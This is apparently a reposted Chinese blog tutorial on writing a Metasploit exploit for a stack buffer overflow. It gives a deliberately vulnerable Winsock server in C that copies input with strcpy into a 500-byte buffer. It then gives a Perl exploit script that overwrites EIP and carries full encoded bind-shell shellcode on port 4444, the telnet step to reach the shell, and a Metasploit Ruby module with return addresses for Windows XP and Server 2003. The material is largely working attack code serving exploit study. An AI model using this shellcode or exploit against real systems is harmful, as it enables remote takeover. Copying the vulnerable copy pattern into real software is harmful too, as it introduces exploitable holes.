编写metasploit exploit 远程socket exploir学习

例子是：

#include <iostream.h> 
#include <winsock.h> 
#include <windows.h> 
#include <stdio.h>
//load windows socket 
#pragma comment(lib, "wsoc	k32.lib") 
//Define Return Messages 
#define SS_ERROR 1 
#define SS_OK 0 
void pr( char *str) 
{ 
	char buf[500]=""; 
	strcpy(buf,str); 
} 
void sError(char *str) 
{ 
	MessageBox (NULL, str, "socket Error" ,MB_OK); 
	WSACleanup(); 
} 
int main(int argc, char **argv) 
{ 
	WORD sockVersion; WSADATA wsaData; 
	int rVal; 
	char Message[5000]=""; 
	char buf[2000]=""; 
	u_short LocalPort; 
	LocalPort = 200; 
	//wsock32 initialized for usage 
	sockVersion = MAKEWORD(1,1); 
	WSAStartup(sockVersion, &wsaData); 
	//create server socket 
	SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0); 
	if(serverSocket == INVALID_SOCKET) 
	{ 
		sError("Failed socket()"); 
		return SS_ERROR; 
	} 
	SOCKADDR_IN sin; 
	sin.sin_family = PF_INET; 
	sin.sin_port = htons(LocalPort); 
	sin.sin_addr.s_addr = INADDR_ANY; 
	//bind the socket 
	rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin)); 
	if(rVal == SOCKET_ERROR) 
	{ 
		sError("Failed bind()"); 
		WSACleanup(); 
		return SS_ERROR; 
	} 
	//get socket to listen 
	rVal = listen(serverSocket, 10); 
	if(rVal == SOCKET_ERROR) 
	{ 
		sError("Failed listen()"); 
		WSACleanup(); 
		return SS_ERROR; 
	} 
	//wait for a client to connect 
	SOCKET clientSocket; 
	clientSocket = accept(serverSocket, NULL, NULL); 
	if(clientSocket == INVALID_SOCKET) 
	{ 
		sError("Failed accept()"); 
		WSACleanup(); 
		return SS_ERROR; 
	} 
	int bytesRecv = SOCKET_ERROR; 
	while( bytesRecv == SOCKET_ERROR ) 
	{ 
		//receive the data that is being sent by the client max limit to 5000 bytes. 
		bytesRecv = recv( clientSocket, Message, 5000, 0 ); 
		if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) 
		{ 
			printf( "\nConnection Closed.\n"); 
			break; 
		} 
	} 
	//Pass the data received to the function pr 
	pr(Message); 
	//close client socket 
	closesocket(clientSocket); 
	//close server socket 
	closesocket(serverSocket); 
	WSACleanup(); 
	return SS_OK; 
} 

典型的EIP 覆盖问题················

perl   SOCKET 代码：  

在CMD 中   perl 1.pl   服务器IP  服务器端口

use strict;
use Socket;
my $junk = "\x41"x504;
my $eip = pack('V',0x769A1594);#0x769A1594      push esp - ret
my $prejumk = "\x90"x46;
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh, 
my $shellcode = 
"\x31\xc9\xdb\xc3\xd9\x74\x24\xf4\xb8\xf3\x9a\xbc\x81\x5b" .
"\xb1\x56\x31\x43\x16\x03\x43\x16\x83\xc3\xf7\x78\x49\x7d" .
"\x1f\xf5\xb2\x7e\xdf\x66\x3a\x9b\xee\xb4\x58\xef\x42\x09" .
"\x2a\xbd\x6e\xe2\x7e\x56\xe5\x86\x56\x59\x4e\x2c\x81\x54" .
"\x4f\x80\x0d\x3a\x93\x82\xf1\x41\xc7\x64\xcb\x89\x1a\x64" .
"\x0c\xf7\xd4\x34\xc5\x73\x46\xa9\x62\xc1\x5a\xc8\xa4\x4d" .
"\xe2\xb2\xc1\x92\x96\x08\xcb\xc2\x06\x06\x83\xfa\x2d\x40" .
"\x34\xfa\xe2\x92\x08\xb5\x8f\x61\xfa\x44\x59\xb8\x03\x77" .
"\xa5\x17\x3a\xb7\x28\x69\x7a\x70\xd2\x1c\x70\x82\x6f\x27" .
"\x43\xf8\xab\xa2\x56\x5a\x38\x14\xb3\x5a\xed\xc3\x30\x50" .
"\x5a\x87\x1f\x75\x5d\x44\x14\x81\xd6\x6b\xfb\x03\xac\x4f" .
"\xdf\x48\x77\xf1\x46\x35\xd6\x0e\x98\x91\x87\xaa\xd2\x30" .
"\xdc\xcd\xb8\x5c\x11\xe0\x42\x9d\x3d\x73\x30\xaf\xe2\x2f" .
"\xde\x83\x6b\xf6\x19\xe3\x46\x4e\xb5\x1a\x68\xaf\x9f\xd8" .
"\x3c\xff\xb7\xc9\x3c\x94\x47\xf5\xe9\x3b\x18\x59\x41\xfc" .
"\xc8\x19\x31\x94\x02\x96\x6e\x84\x2c\x7c\x19\x82\xe2\xa4" .
"\x4a\x65\x07\x5b\x7d\x29\x8e\xbd\x17\xc1\xc6\x16\x8f\x23" .
"\x3d\xaf\x28\x5b\x17\x83\xe1\xcb\x2f\xcd\x35\xf3\xaf\xdb" .
"\x16\x58\x07\x8c\xec\xb2\x9c\xad\xf3\x9e\xb4\xa4\xcc\x49" .
"\x4e\xd9\x9f\xe8\x4f\xf0\x77\x88\xc2\x9f\x87\xc7\xfe\x37" .
"\xd0\x80\x31\x4e\xb4\x3c\x6b\xf8\xaa\xbc\xed\xc3\x6e\x1b" .
"\xce\xca\x6f\xee\x6a\xe9\x7f\x36\x72\xb5\x2b\xe6\x25\x63" .
"\x85\x40\x9c\xc5\x7f\x1b\x73\x8c\x17\xda\xbf\x0f\x61\xe3" .
"\x95\xf9\x8d\x52\x40\xbc\xb2\x5b\x04\x48\xcb\x81\xb4\xb7" .
"\x06\x02\xca\x46\x9a\x9f\x5b\xf1\x4f\xe2\x01\x02\xba\x21" .
"\x3c\x81\x4e\xda\xbb\x99\x3b\xdf\x80\x1d\xd0\xad\x99\xcb" .
"\xd6\x02\x99\xd9";

my $host = shift || 'localhost';
my $port = shift || 200;
my $proto = getprotobyname('tcp');

my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port,$iaddr);

socket(SOCKET,AF_INET,SOCK_STREAM,$proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET,$paddr) or die "connect: $!";

print "[+] Sending payload";
print SOCKET $junk.$eip.$prejumk.$shellcode."\n";

print "[+] Payload sent\n";
close SOCKET or die "cose: $!";

执行完后   

telnet    服务器IP  4444   即可得到shell

主要能看懂metasploit 就好了·········

C:\Program Files\Metasploit\Framework3\msf3\modules\exploits\windows\misc 创建文件  xxx.rb

require 'msf/core' class Metasploit3 < Msf::Exploit::Remote 

	include Msf::Exploit::Remote::Tcp 
	def initialize(info = {}) 
		super(update_info(info, 
			'Name' => 'Custom vulnerable server stack overflow', 
			'Description' => %q{ 
				This module exploits a stack overflow in a 
				custom vulnerable server. 
				}, 
			'Author' => [ 'Peter Van Eeckhoutte' ], 
			'Version' => '$Revision: 9999 $', 
			'DefaultOptions' => 
				{ 
				'EXITFUNC' => 'process', 
				}, 
			'Payload' => 
				{ 
				'Space' => 1400, 
				'BadChars' => "\x00\xff", 
				}, 
			'Platform' => 'win', 
			'Targets' => 
				[ 
					['Windows XP SP3 En', { 'Ret' => 0x7c874413, 'Offset' => 504 } ], 
					['Windows 2003 Server R2 SP2', { 'Ret' => 0x71c02b67, 'Offset' => 504 } ], 
				], 
			'DefaultTarget' => 0, 
			'Privileged' => false )) 
			
		register_options( [ Opt::RPORT(200) ], self.class) 
	end 

	def exploit 
		connect 

		junk = make_nops(target['Offset']) 
		sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded 
		sock.put(sploit) 
		handler 
		disconnect 
	end 
end

转载于:https://www.cnblogs.com/zcc1414/p/3982388.html